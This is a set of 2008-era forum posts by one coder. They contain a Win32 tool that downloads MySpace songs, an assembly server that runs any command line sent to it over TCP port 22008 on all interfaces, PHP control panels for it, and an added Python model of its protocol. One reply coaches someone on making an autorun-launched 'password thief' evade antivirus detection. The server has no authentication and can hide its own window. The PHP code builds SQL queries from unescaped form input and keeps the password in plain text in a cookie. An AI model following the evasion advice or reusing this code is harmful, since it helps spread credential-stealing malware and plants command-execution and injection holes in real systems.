void DownloadThread(void);
int ListSongs(void);
int cmp(char*, char*, int);

char* head = 0;
char* postdata = 0;
char* recvdata = 0;
char* songs = 0;
char dbg[200];

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmd, int nCmdShow)
{
    MSG Msg;
    WNDCLASSEX wc;
    hInst = hInstance;
    wc.cbSize = sizeof(WNDCLASSEX);
    wc.hInstance = hInstance;
    wc.lpszClassName = "MyspaceJuke_Class";
    wc.lpfnWndProc = WndProc;
    wc.style = CS_DBLCLKS;
    wc.hIcon = LoadIcon(hInst, MAKEINTRESOURCE(101));
    wc.hIconSm = LoadIcon(hInst, MAKEINTRESOURCE(101));
    wc.hCursor = LoadCursor(0, IDC_ARROW);
    wc.lpszMenuName = NULL;
    wc.cbClsExtra = 0;
    wc.cbWndExtra = 0;
    wc.hbrBackground = (HBRUSH)GetStockObject(0);
    RegisterClassEx(&wc);

    // Initialize common controls library!
    InitCommonCtrls(); // to make sure you can see the controls!

    //Create the window
    hwnd = CreateWindowEx(0, "MyspaceJuke_Class", "MyspaceJuke", WS_OVERLAPPED|WS_CAPTION|WS_SYSMENU|WS_MINIMIZEBOX|WS_CLIPSIBLINGS, CW_USEDEFAULT, CW_USEDEFAULT, 290, 150, HWND_DESKTOP, 0, hInstance, 0);
    CreateTextEx(hwnd, "FriendID:", 1, 1, 60, 22, 200);
    fID = CreateEditEx(hwnd, 0, 0, 0, 65, 1, 135, 22, 400);
    CreateButtonEx(hwnd, "Get Songs", 202, 1, 80, 22, 420);
    CreateTextEx(hwnd, "Select Song:", 1, 30, 100, 20, 201);
    song = CreateDropDownEx(hwnd, 0, 1, 50, 200, 100, 300);
    CreateButtonEx(hwnd, "Download", 202, 50, 80, 22, 421);
    CreateTextEx(hwnd, "© 2008 Steve8x", 85, 90, 150, 22, 202);
    songs = (char*)malloc(5000);
    recvdata = (char*)malloc(100000);

    //Show our window
    ShowWindow(hwnd, nCmdShow);
    UpdateWindow(hwnd);

    //Init winsock 2.2
    WSADATA wsaData = {0};
    WSAStartup(MAKEWORD(2, 2), &wsaData);

    while(GetMessage(&Msg, 0, 0, 0))
    {
        TranslateMessage(&Msg);
        DispatchMessage(&Msg);
    }
    return Msg.wParam;
}

LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    switch (message)
    {
    case WM_COMMAND:
        if(wParam == 420) //Get Songs button pressed
        {
            CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&WorkerThread, 0, 0, 0);
        }
        if(wParam == 421) //Download button pressed
        {
            CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&DownloadThread, 0, 0, 0);
        }
        break;
    case WM_LBUTTONDOWN: //I do this for all my apps, I like dragging the window from anywhere
        SendMessage(hWnd, WM_NCLBUTTONDOWN, HTCAPTION, lParam);
        break;
    case WM_CTLCOLORSTATIC:
        SetBkMode((HDC)wParam, TRANSPARENT);
        return (LRESULT)GetStockObject(WHITE_BRUSH);
        break;
    case WM_CLOSE:
        free(recvdata);
        free(songs);
        WSACleanup();
        PostQuitMessage(0);
        break;
    default:
        return DefWindowProc(hWnd, message, wParam, lParam);
    }
    return 0;
}

void WorkerThread()
{
    xClient* cli = new xClient;
    head = (char*)malloc(1000);
    postdata = (char*)malloc(10000);
    //malloc does not init memory to zero
    ZeroMemory(head, 1000);
    ZeroMemory(postdata, 10000);
    ZeroMemory(recvdata, 100000);
    GetWindowTextA(fID, dbg, 101);
    sprintf(head, HEADER, dbg);
    sprintf(postdata, "%s HTTP/1.1\r\nAccept: */*\r\nConnection: close\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n\r\n", head, HOST);
    cli->ConnectToServer(HOST, 80);
    sendx(cli->serversock, postdata, strlen(postdata));
    recvx(cli->serversock, recvdata, 100000);
    cli->Close();
    OutputDebugString(recvdata);
    int numsongs = ListSongs();
    sprintf(dbg, "number of songs = %i", numsongs);
    OutputDebugString(dbg);
    SendMessage(song, CB_SETCURSEL, 0, 0);
    //Clean up
    delete cli;
    free(head);
    free(postdata);
    ExitThread(0);
}

int ListSongs() // i changed to using the cmp function i created so i could compare more than 32 bits at a time
{
    int numsongs = 0;
    DWORD i = 0;
    char* songname = (char*)malloc(200);
    char* title = recvdata;
    ZeroMemory(songname, 200);
    ZeroMemory(songs, 5000);
    SendMessage(song, CB_RESETCONTENT, 0, 0); // clears the list box
nextsong:
    //while(*(DWORD*)title != 0x6C746974) // 'titl'
    while(cmp(title, "title=\"", 7) == 0) // locate song title
    {
        //if(*(DWORD*)titl == 0x72702F3C) // '</pr'
        if(cmp(title, "</playlist>", 11) == 1)
        {
            //end of songs in xml file reached
            SendMessage(song, CB_SHOWDROPDOWN, 1, 0);
            free(songname);
            return numsongs;
        }
        title++;
    }
    title += 7; // get past 'title="'
    int stringsize = 0;
    char* endofstring = title;
    //get string size by counting the characters until the next double quote
    while(*(BYTE*)endofstring != 0x22) // '"'
    {
        endofstring++;
        stringsize++;
    }
    //copy song name into string array
    memcpy(songname, title, stringsize);
    strcpy(&songs[i], songname);
    //zero 'songname' temporary buffer in prep for next song
    ZeroMemory(songname, 200);
    SendMessage(song, CB_ADDSTRING, 0, (LPARAM)&songs[i]);
    i += (stringsize + 1); //calculate next string offset
    numsongs++;
    goto nextsong;
}

void DownloadThread()
{
    char* downloadurl = (char*)malloc(1000);
    char* songurl = recvdata;
    LRESULT selectedsong;
    ZeroMemory(downloadurl, 1000);
    selectedsong = SendMessage(song, CB_GETCURSEL, 0, 0);
    selectedsong += 1;
    while(selectedsong != 0) // locate url of song selected
    {
        //while(*(DWORD*)songurl != 0x6C727564) // 'durl'
        while(cmp(songurl, "durl=\"", 6) == 0)
        {
            songurl++;
        }
        songurl++;
        selectedsong--;
    }
    songurl += 5; // get past 'url="'
    int urlsize = 0;
    char* endofstring = songurl;
    while(*(BYTE*)endofstring != 0x22) // '"'
    {
        endofstring++;
        urlsize++;
    }
    memcpy(downloadurl, songurl, urlsize);
    //download the file in your default web browser
    ShellExecute(0, "open", downloadurl, 0, 0, SW_SHOWNORMAL);
    free(downloadurl);
}

int cmp(char* str1, char* str2, int strsize) // compare non null terminated strings by specifying size
{
    for(int i = 0; i < strsize; i++)
    {
        //if(*(BYTE*)&str1[i] != *(BYTE*)&str2[i]) // == same as line below
        if(str1[i] != str2[i])
        {
            //strings not equal
            return 0;
        }
    }
    //strings are equal
    return 1;
}
  4. Hiding the autorun.inf won't change anything... Get rid of the autorun.inf, and you'll still be detected... it isn't the autorun.inf that is detected! It is the program you're executing with it! nircmd? I'm not sure what that is but I don't think you coded it... as I've heard someone else talk about it before you... What you need to do is actually write your own source code. Then you shouldn't be detected; even if you are, you can then modify the source easily and make it undetectable... What does this "password thief" actually do? Take passwords from firefox + IE? (That's my guess.) Replicate what it does with code in a new project. Is this program packed? If not you can easily disassemble it and see the functions + APIs it calls. You shouldn't be using nircmd at all; it should say shellexecute=myprogram.exe. Without source code you're screwed. You need it to be able to easily take code out (commenting code) and recompile it into a new exe. That's what helps you in determining what is detected and what is not. Code that is detected must be modified! Code that is not can be left alone.
  5. Should the user be able to choose any song to listen to? Should they be able to not only listen but download the music files as well? If the answer to those is no then I would do streaming audio with winamp. I've done it before with an IceCast server: you make a playlist in winamp and then have it stream through the icecast server... The stream can be played in anything that plays .m3u files (your live stream); windows media player can play them! I also have a flash player that can connect to the stream as well! ;) This way the user cannot download the files, only hear them in the stream, and they also can't change the song. It's like a radio broadcast in a way... There is a way to convert the stream into mp3 files though, e.g. streamripper. Otherwise, if you wanted the users to be able to download the songs and choose what they want to listen to, then as moonlit suggested a shared folder will do the trick. What I like to do though is put the music files on a webserver and have a flash based web player play them in like a playlist. Then they can choose any song and it plays right off the web browser... They can also download them (actually if they're listening to it they've already downloaded it, it's in their browser cache). If you'd want users to be able to listen to any song but NOT download them, then you'd have to make a more complicated flash player, like myspace.com's player for example: you can't download the mp3s unless the artist allows it, only listen to them. They achieve that by sending a stream instead of the actual mp3 file! But like all streams they can be converted back to mp3 :) but it's more secure...
  6. Well thanks digital pirate! Anyway, today I was thinking about this, and there is something that I didn't like about the previous run.exe! It constantly reads from a text file every minute! Even though the text file is small and there's only 60 reads per hour, it still is extra wear and tear on your hard drive that will add up if running it for hours! Also it kinda sucks to have to wait 1 minute between commands... So I thought of a new idea! This time we will use our beloved sockets! I realized that PHP CAN use sockets to communicate with other socket apps! I upgraded my MASM32 to version 10 from 9 (since a new version was released!) and redid the run.exe. It now acts as a server instead of a file reader... You run the server "ExecuteServer.exe" and leave it running. It is now a console app. Pressing CTRL + ALT + R will hide/unhide the console window so you don't have to look at it... I also now use WinExec instead of ShellExecute, since it's more like typing into a command prompt (cmd.exe) than ShellExecute!! I liked your idea about being able to shut down the computer from the PHP script! So that contributed to using WinExec as well... You can now execute commands in your system32 folder without providing the full path, WITH PARAMETERS TOO! Observe from the image. Files from other paths than system32 can still be executed with params! As I have done so with Ghost and it worked... It now also opens and closes your main CD-ROM drive just for fun lol! Sending the server "cd -o\r\n" or "cd -c\r\n" opens or closes it... You send the server "exec $command\r\n" to get it to execute a command; it's like having a shell to your machine from PHP :) You add commands and then you can execute them by specifying the id just like previously. There is no longer any wait! No more text file, no more 1 minute wait time, it's immediate! Since your PHP script and the server are running on the same machine, the PHP script connects to localhost!
And as long as you don't open any holes in your firewall allowing incoming packets to your server machine on port 22008 it will not be accessible from anything except your password protected PHP script! ;)

ExecuteServer.asm (4KB, assembles in MASM32 v10):

;Remote Execute Server 1.0
;Coded by Steve8x
; ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
;standard includes file
include \masm32\include\masm32rt.inc
;extra includes used
include \masm32\include\wsock32.inc
include \masm32\include\winmm.inc
includelib \masm32\lib\wsock32.lib
includelib \masm32\lib\winmm.lib
; ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
comment * -----------------------------------------------------
Build this console app with "MAKEIT.BAT" on the PROJECT menu.
----------------------------------------------------- *

clearbuffer PROTO
windowhide PROTO

.data?
servsock     SOCKET ?
clientsock   SOCKET ?
sockaddr1    sockaddr_in <>
sockaddr2    sockaddr_in <>
WSockData    WSADATA <>
outputhandle dd ?
tmp          dd ?

.data
wndtitle db 'Remote Execute Server v1.0 - Steve8x',0
mci1     db 'set cdaudio door open',0
mci2     db 'set cdaudio door closed',0
mci3     db 0
buffer   db 512 dup(0)          ; one request line at a time, "cd ...\r\n" or "exec ...\r\n"

.code
start:
; ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
    invoke GetStdHandle, STD_OUTPUT_HANDLE
    mov [outputhandle], eax
    invoke SetConsoleTextAttribute, [outputhandle], BACKGROUND_RED + FOREGROUND_GREEN + FOREGROUND_INTENSITY
    cls
    print "Server Started...",13,10
    invoke SetConsoleTitleA, addr wndtitle
    invoke CreateThread, 0, 0, addr windowhide, 0, 0, 0   ; CTRL+ALT+R hide/unhide watcher
    call main
    exit
; ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
main proc
    invoke WSAStartup, 0202h, addr WSockData
    invoke socket, PF_INET, SOCK_STREAM, 0
    mov [servsock], eax
    xor eax, eax
    mov sockaddr1.sin_family, AF_INET
    mov sockaddr1.sin_addr, eax      ; 0 = INADDR_ANY: the socket listens on every interface, not only
                                     ; 127.0.0.1, so the firewall is what keeps port 22008 off the network
    invoke htons, 22008
    mov sockaddr1.sin_port, ax
    invoke bind, [servsock], addr sockaddr1, sizeof sockaddr_in
    .if eax == SOCKET_ERROR
        invoke OutputDebugString, SADD("SOCKET ERROR: could not bind socket")
        call WSACleanup
        xor eax, eax
        ret
    .endif
    invoke listen, [servsock], 1
    cls
    print "Server Active...",13,10,13,10
next_connection:
    invoke closesocket, [clientsock] ; harmless INVALID_SOCKET on the first pass
    mov eax, sizeof sockaddr_in
    mov [tmp], eax
    invoke accept, [servsock], addr sockaddr2, addr tmp
    mov [clientsock], eax
    ;if it gets here a client is connected
next_cmd:
    mov edi, offset buffer
    mov eax, sizeof buffer
    push edi
    call clearbuffer
    pop edi
recvx:
    invoke recv, [clientsock], edi, 300, 0   ; 300 < sizeof buffer, so clearbuffer always finds a zero dword
    or eax, eax
    jz next_connection                       ; client closed
    cmp eax, SOCKET_ERROR
    je next_connection
    push edi
    add edi, eax
    mov al, [edi-1]                          ; last byte received
    pop edi
    cmp al, 10                               ; 0x0A/0Ah: keep reading until the line ends
    jne recvx
    cmp word ptr [edi], "dc"                 ; "cd" in memory
    je cddrive
    cmp dword ptr [edi], "cexe"              ; "exec" in memory
    je executecmd
invalidcommand:
    ;should never happen if you're sending the commands from PHP correctly
    print "Client Sent Invalid Command!",13,10
    invoke OutputDebugString, SADD("error")
    jmp next_connection
cddrive:
    invoke SetConsoleTextAttribute, [outputhandle], FOREGROUND_GREEN + FOREGROUND_INTENSITY
    mov ax, [edi+3]                          ; param in ax, either "-o" or "-c"
    cmp ax, "o-"
    je opencdrom
    cmp ax, "c-"
    jne invalidcommand
closecdrom:
    invoke mciSendString, addr mci2, addr mci3, 0, 0
    print "Client Sent:",13,10
    print edi,13,10
    jmp next_connection
opencdrom:
    invoke mciSendString, addr mci1, addr mci3, 0, 0
    print "Client Sent:",13,10
    print edi,13,10
    jmp next_connection
executecmd:
    invoke SetConsoleTextAttribute, [outputhandle], FOREGROUND_RED + FOREGROUND_INTENSITY
    invoke lstrlen, addr buffer
    xor ebx, ebx
    mov [edi+eax-2], bx                      ; null out the \r\n at the end of the string
    add edi, 5                               ; get past "exec "
    invoke WinExec, edi, SW_SHOWNORMAL       ; the rest of the line, verbatim, is the command line
    sub edi, 5
    print "Client Sent:",13,10
    print edi,13,10,13,10
    jmp next_connection
shutdownserver:                              ; not reached: there is no "quit" command in the protocol
    invoke closesocket, [servsock]
    invoke closesocket, [clientsock]
    call WSACleanup
    xor eax, eax
    ret
main endp

clearbuffer proc
    ; zero dwords from edi until the first dword that is already zero
@@:
    xor edx, edx
    mov [edi], edx
    add edi, 4
    mov ebx, [edi]
    test ebx, ebx
    jnz @b
    ret
clearbuffer endp

windowhide proc
    LOCAL showhide:DWORD
    LOCAL hWnd:DWORD
    invoke FindWindow, 0, addr wndtitle
    mov [hWnd], eax
    mov [showhide], 1
CheckKeys:
    invoke Sleep, 10
    invoke GetKeyState, VK_CONTROL           ; CONTROL key
    and al, 80h
    cmp al, 0
    jz CheckKeys
    invoke GetKeyState, VK_MENU              ; ALT key
    and al, 80h
    cmp al, 0
    jz CheckKeys
    invoke GetKeyState, 52h                  ; R key
    and al, 80h
    cmp al, 0
    jz CheckKeys
    ; If all keys CTRL + ALT + R are simultaneously pressed the execution will reach here
    xor [showhide], 1                        ; 1 = SW_SHOWNORMAL, 0 = SW_HIDE
    invoke ShowWindow, [hWnd], [showhide]    ; If showhide == 1 it will show the window, 0 it will hide it ;)
    invoke Sleep, 250                        ; so it won't hide/unhide really quickly, if you don't know what I mean try it without
    jmp CheckKeys
windowhide endp
; ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
end start

new config.php:

<?php
$dbhost = 'localhost:3306';
$dbuser = 'root';
$dbpass = 'mypassword';
$dbname = 'remoteexecute';
$Self = $_SERVER['PHP_SELF'];
$conn = mysql_connect($dbhost, $dbuser, $dbpass) or die ('Error connecting to mysql');
//Create a database to use if it does not exist yet!
$query = "CREATE DATABASE IF NOT EXISTS remoteexecute";
$result = mysql_query($query);
mysql_select_db($dbname);
//Create a table which will hold the name and command line of the programs we want to execute
$query = "CREATE TABLE IF NOT EXISTS cmds(id INT NOT NULL, name VARCHAR(64) NOT NULL, command VARCHAR(260) NOT NULL, PRIMARY KEY(id))";
mysql_query($query);
?>

new index.php (remote control panel):

<?php
include('config.php');
//Username and password protect this page!
//so that only you can access it and run programs remotely on your machine!
//change both and don't tell anyone!
$username = "username";
$password = "password";

if(isset($_POST['auth'])) // you submitted your login info, so store it in a cookie
{
    $user = $_POST['user'];
    $pass = $_POST['pword'];
    $logininfo = "$user-$pass";
    setcookie("adminaccess", $logininfo, time()+1200); // 1200 = 20 minutes
    echo "<meta http-equiv='refresh' content='0;url=$Self'>";
}
if(isset($_COOKIE['adminaccess'])) // every time you refresh the page the cookie's expire time will be extended 20 minutes
{
    $logininfo = $_COOKIE['adminaccess'];
    setcookie("adminaccess", $logininfo, time()+1200);
}
echo "<html>";
echo "<head>";
echo "<title>Remote Code Execution Through PHP</title>";
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">";
echo "</head><body>";
echo "<center>";
//if no cookie is set, then show the login form
if(!isset($_COOKIE['adminaccess']))
{
    echo "<h1> Admin Login: </h1>";
    echo "<p><form method='post' action='$Self'>";
    echo "<table border='2' cellspacing='2' cellpadding='0'><tr>";
    echo "<td>Username: </td><td> <input name='user' type='text' id='user'> </td> </tr>";
    echo "<tr><td>Password: </td><td> <input name='pword' type='password' id='pword'></td></tr> </table>";
    echo "<p> <input type='submit' name='auth' id='auth' value='Login'>";
    echo "</form>";
    die();
}
else
{
    //otherwise validate the username and password stored in the cookie!
    $logininfo = $_COOKIE['adminaccess'];
    list($usr, $pass) = split('-', $logininfo);
    //If you enter the wrong username or password you'll have to clear the cookie from your browser
    //it's made that way as an annoyance to deter someone from attempting to guess
    // HOWEVER they shouldn't know about your page anyway...
    if($usr != $username)
    {
        die("<h1>INVALID CREDENTIALS!!!</h1>");
    }
    if($pass != $password)
    {
        die("<h1>INVALID CREDENTIALS!!!</h1>");
    }
    //everything is valid!! continue!
    if(isset($_POST['add']))
    {
        if(isset($_POST['cmdname']) && isset($_POST['command']))
        {
            //count number of entries + 1
            $nextid = 0;
            $query = "SELECT * FROM cmds";
            $result = mysql_query($query);
            while($row = mysql_fetch_array($result))
            {
                $nextid++;
            }
            $nextid++;
            $cmdname = $_POST['cmdname'];
            $cmd = $_POST['command'];
            $query = "INSERT INTO cmds (id, name, command) VALUES ('$nextid', '$cmdname', '$cmd')";
            mysql_query($query);
            echo "<b>Successfully added entry to the database!</b><p>";
        }
        else
        {
            echo "<b>Insertion Failed! provide name + command!</b><p>";
        }
    }
    if(isset($_POST['del']))
    {
        if(isset($_POST['id']))
        {
            $deletebyitemid = (int)$_POST['id']; // the id is always a number
            $query = "DELETE FROM cmds WHERE id = $deletebyitemid";
            mysql_query($query);
            if($deletebyitemid > 0)
            {
                //since we're deleting an item update the ids after it to minus 1
                $query = "UPDATE cmds SET id = id - 1 WHERE id > $deletebyitemid";
                mysql_query($query);
            }
            echo "<b>Successfully removed entry!</b><p>";
        }
        else
        {
            echo "<b>Failed to remove entry!</b><p>";
        }
    }
    if(isset($_POST['exec']))
    {
        if(isset($_POST['id']))
        {
            $id = (int)$_POST['id'];
            $query = "SELECT * FROM cmds WHERE id = $id";
            $result = mysql_query($query);
            $row = mysql_fetch_array($result);
            if(!$row)
            {
                echo "<b> No entry with that ID! </b><p>";
            }
            else
            {
                $cmd = $row[2];
                $writestring = "exec $cmd\r\n"; // sent to the server which does WinExec (like using cmd.exe)
                //port 22008 was picked by me, if you wanted to change this
                //you'd also have to change it on the server and re-assemble it!
                $sock = fsockopen("127.0.0.1", 22008, $error, $error2);
                if($sock)
                {
                    fwrite($sock, $writestring);
                    fclose($sock);
                    echo "<b> Command Has Executed Successfully!</b><p>";
                }
                else
                {
                    echo "<b> ERROR #$error: $error2 </b><p>";
                }
            }
        }
    }
    if(isset($_POST['opencd']))
    {
        $writestring = "cd -o\r\n"; // -o means open
        $sock = fsockopen("127.0.0.1", 22008, $error, $error2);
        if($sock)
        {
            fwrite($sock, $writestring);
            fclose($sock);
            echo "<b> Success! </b><p>";
        }
        else
        {
            echo "<b> ERROR #$error: $error2 </b><p>";
        }
    }
    if(isset($_POST['closecd']))
    {
        $writestring = "cd -c\r\n"; // -c means close
        $sock = fsockopen("127.0.0.1", 22008, $error, $error2);
        if($sock)
        {
            fwrite($sock, $writestring);
            fclose($sock);
            echo "<b> Success! </b><p>";
        }
        else
        {
            echo "<b> ERROR #$error: $error2 </b><p>";
        }
    }
    echo "<h1> Remote Execution Control Panel 2.0 </h1>";
    echo "<form method='POST' action='$Self'>";
    echo "<table border='0' cellpadding='0' cellspacing='4'>";
    echo "<tr><td>ID</td><td><input type='text' name='id' size='5'></td></tr>";
    echo "<tr><td>Name</td><td><input type='text' name='cmdname'></td></tr>";
    echo "<tr><td>Command</td><td><input type='text' name='command' size='50'></td></tr>";
    echo "</table><br><input type='submit' name='add' value='Add To List'> ";
    echo "<input type='submit' name='del' value='Delete From List'> ";
    echo "<input type='submit' name='exec' value='Execute!'><p> ";
    echo "<input type='submit' name='opencd' value='Open CDROM!'> <input type='submit' name='closecd' value='Close CDROM!'>";
    echo "</form><p>";
    $query = "SELECT * FROM cmds";
    $result = mysql_query($query);
    echo "<table border='1' cellspacing='1' cellpadding='1'>";
    echo "<tr><th>ID</th><th>Name</th><th>Command</th></tr>";
    while($row = mysql_fetch_array($result))
    {
        $id = $row[0];
        $name = $row[1];
        $cmd = $row[2];
        echo "<tr><td>$id</td><td>$name</td><td>$cmd</td></tr>";
    }
    echo "</table></center></body></html>";
}
?>

ExecuteServer source code + binary! You can run it from anywhere unlike before; place the folder somewhere in your masm32 directory if wanting to modify and re-assemble it!
http://popeax.com/remoteexecute/ExecuteServer.zip

remotecontrol2 PHP files:
http://popeax.com/remoteexecute/remotecontrol2.zip

And that's about it! Let me know if you can think of any more improvements that could be done!
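As an added example (not Steve8x's code), here is a small Python model of the protocol from the post above, written so the server's dispatch and the PHP side's framing can be traced without assembling anything. It reproduces what ExecuteServer.asm does byte for byte: read until the last byte received is 0x0A, compare the first bytes of the buffer against "cd" and "exec", blank the last two bytes of the line and hand the remainder to WinExec. `check_cookie` reproduces the `list($usr, $pass) = split('-', $_COOKIE['adminaccess'])` check from index.php, which is why a password containing a hyphen can never log in. The function names and the sample commands are this example's own.

```python
# Added example, not from the original post: a Python model of how
# ExecuteServer.asm dispatches one request and how index.php frames it.
# The names frame_request / dispatch / check_cookie are this example's own.

CRLF = "\r\n"
PORT = 22008  # the port hard-coded in both ExecuteServer.asm and index.php


def frame_request(kind, arg=""):
    """Build the exact bytes index.php fwrite()s to 127.0.0.1:22008."""
    if kind == "exec":
        line = "exec " + arg            # "exec $cmd\r\n"
    elif kind == "cd":
        line = "cd " + arg              # "cd -o\r\n" or "cd -c\r\n"
    else:
        raise ValueError("unknown request kind: " + kind)
    return (line + CRLF).encode("latin-1")


def dispatch(raw):
    """Mirror the .asm dispatcher; returns (action, argument).

    The server keeps calling recv() until the last byte it has seen is 0x0A,
    then compares the first bytes of the buffer against "cd" and "exec".
    Anything else prints "Client Sent Invalid Command!" and drops the client.
    """
    if not raw or raw[-1:] != b"\n":
        return ("incomplete", None)     # asm jumps back to recvx
    text = raw.decode("latin-1")
    if text.startswith("cd"):
        flag = text[3:5]                # mov ax,[edi+3]: the "-o" / "-c" pair
        if flag == "-o":
            return ("cdrom", "open")
        if flag == "-c":
            return ("cdrom", "close")
        return ("invalid", text)
    if text.startswith("exec"):
        # lstrlen, then the last two bytes are nulled (assumed to be "\r\n"),
        # then edi is advanced past "exec ". Whatever is left goes to WinExec
        # unmodified, so a client that sends only "\n" loses one character.
        cmd = text[5:-2]
        return ("winexec", cmd)
    return ("invalid", text)


def check_cookie(cookie, username, password):
    """Reproduce index.php: list($usr,$pass) = split('-', $cookie), then two
    string compares. The cookie carries the password in clear text."""
    parts = cookie.split("-")
    usr = parts[0]
    pwd = parts[1] if len(parts) > 1 else ""
    return usr == username and pwd == password


def exchange(kind, arg=""):
    """Both sides of one round trip: what PHP sends and what the server does."""
    wire = frame_request(kind, arg)
    return wire, dispatch(wire)


if __name__ == "__main__":
    for kind, arg in (("exec", "notepad.exe"), ("cd", "-o"), ("cd", "-x")):
        wire, result = exchange(kind, arg)
        print(repr(wire), "->", result)
    print(check_cookie("bob-s3cret", "bob", "s3cret"))     # True
    print(check_cookie("bob-my-pass", "bob", "my-pass"))   # False: split on '-'
```

`dispatch(b"exec calc\n")` returns `("winexec", "cal")`, which is the server's behaviour for a client that terminates lines with a bare LF; index.php always sends CRLF, so it never hits this.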
  7. OK, well I like running my Apache as a service, so that's out of the question... But thanks for that info, I suspect that you probably are correct! I have found a way around this though! I was at first thinking to create a server app and a client app, and have you run the client app wherever you are and connect to the server to make it run a program, though that would require port forwarding, + the thread starter wanted to control what programs are executed on his server machine THROUGH PHP! So I've done just that! Here's how it works: you run this program yourself, NOT FROM PHP, called "run.exe", from the same folder where a couple of PHP files I've created go... Create a new dir in your webserver folder called /remotecontrol/ or something similar, but that no one will think of... The run.exe constantly runs on your machine, like httpd.exe... Every 1 minute it reads from a file called "runinfo.txt". The first line contains a string number, 1 or 0. The next line contains a path to the exe to execute. If the first line is a 1 it executes the file, and re-saves the file with the first line as a zero so that it doesn't keep running the program every minute... If it's zero it does nothing... If you don't have a MySQL database, I recommend getting one as it's a nice thing to have! I couldn't imagine having a webserver without a database! My PHP script uses a database to store names and paths to programs you want to execute, and you can easily add and remove from the list with the web front! The ID field is used to delete from the list or execute a program: simply type the id into the box and press the "Delete From List" or "Execute" button... Other fields are ignored for these two actions. The "Name" and "Path" fields are used to add to the list; you can see from the picture what to do! Make sure that paths include \\ double slashes, or no slashes will show up in the table below and it won't work if you try to execute it... The path is limited to MAX_PATH characters, which is 260...
So make sure your programs have a path equal to or shorter than that. And that's about it!

Here's the source code to the Remote Execution Control Panel. Be sure to change the $username and $password variables at the top; you will use them to login!

<?php
include('config.php');
//Username and password protect this page!
//so that only you can access it and run programs remotely on your machine!
//change both and don't tell anyone!
$username = "ACBobby";
$password = "ilikephp";

if(isset($_POST['auth'])) // you submitted your login info, so store it in a cookie
{
    $user = $_POST['user'];
    $pass = $_POST['pword'];
    $logininfo = "$user-$pass";
    setcookie("adminaccess", $logininfo, time()+1200); // 1200 = 20 minutes
    echo "<meta http-equiv='refresh' content='0;url=$Self'>";
}
if(isset($_COOKIE['adminaccess'])) // every time you refresh the page the cookie's expire time will be extended 20 minutes
{
    $logininfo = $_COOKIE['adminaccess'];
    setcookie("adminaccess", $logininfo, time()+1200);
}
echo "<html>";
echo "<head>";
echo "<title>Remote Code Execution Through PHP</title>";
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">";
echo "</head><body>";
echo "<center>";
//if no cookie is set, then show the login form
if(!isset($_COOKIE['adminaccess']))
{
    echo "<h1> Admin Login: </h1>";
    echo "<p><form method='post' action='$Self'>";
    echo "<table border='2' cellspacing='2' cellpadding='0'><tr>";
    echo "<td>Username: </td><td> <input name='user' type='text' id='user'> </td> </tr>";
    echo "<tr><td>Password: </td><td> <input name='pword' type='password' id='pword'></td></tr> </table>";
    echo "<p> <input type='submit' name='auth' id='auth' value='Login'>";
    echo "</form>";
    die();
}
else
{
    //otherwise validate the username and password stored in the cookie!
    $logininfo = $_COOKIE['adminaccess'];
    list($usr, $pass) = split('-', $logininfo);
    //If you enter the wrong username or password you'll have to clear the cookie from your browser
    //it's made that way as an annoyance to deter someone from attempting to guess
    // HOWEVER they shouldn't know about your page anyway...
    if($usr != $username)
    {
        die("<h1>INVALID CREDENTIALS!!!</h1>");
    }
    if($pass != $password)
    {
        die("<h1>INVALID CREDENTIALS!!!</h1>");
    }
    //everything is valid!! continue!
    if(isset($_POST['add']))
    {
        if(isset($_POST['exename']) && isset($_POST['path']))
        {
            //count number of entries + 1
            $nextid = 0;
            $query = "SELECT * FROM exes";
            $result = mysql_query($query);
            while($row = mysql_fetch_array($result))
            {
                $nextid++;
            }
            $nextid++;
            $exe = $_POST['exename'];
            $path = $_POST['path'];
            $query = "INSERT INTO exes (id, name, path) VALUES ('$nextid', '$exe', '$path')";
            mysql_query($query);
            echo "<b>Successfully added entry to the database!</b><p>";
        }
        else
        {
            echo "<b>Insertion Failed! provide name + path!</b><p>";
        }
    }
    if(isset($_POST['del']))
    {
        if(isset($_POST['id']))
        {
            $deletebyitemid = (int)$_POST['id']; // the id is always a number
            $query = "DELETE FROM exes WHERE id = $deletebyitemid";
            mysql_query($query);
            //since we're deleting an item update the ids after it to minus 1
            $query = "UPDATE exes SET id = id - 1 WHERE id > $deletebyitemid";
            mysql_query($query);
            echo "<b>Successfully removed entry!</b><p>";
        }
        else
        {
            echo "<b>Failed to remove entry!</b><p>";
        }
    }
    if(isset($_POST['exec']))
    {
        if(isset($_POST['id']))
        {
            $id = (int)$_POST['id'];
            $query = "SELECT * FROM exes WHERE id = $id";
            $result = mysql_query($query);
            $row = mysql_fetch_array($result);
